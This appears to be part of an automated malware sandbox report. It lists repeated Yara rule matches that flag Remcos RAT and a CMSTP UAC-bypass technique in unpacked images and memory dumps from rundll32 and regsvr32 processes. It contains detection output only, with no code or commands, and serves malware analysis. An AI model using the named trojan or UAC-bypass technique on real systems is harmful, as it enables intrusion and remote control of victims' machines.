              Source: Yara match | File source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000F.00000002.2209122864.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000011.00000002.2210786919.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000019.00000002.2593057749.000000000308A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000E.00000002.2195089206.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara match | File source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000012.00000002.2229274510.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1C9E2 SystemParametersInfoW, | 12_2_02B1C9E2
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A1C9E2 SystemParametersInfoW, | 15_2_02A1C9E2

              System Summary

              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
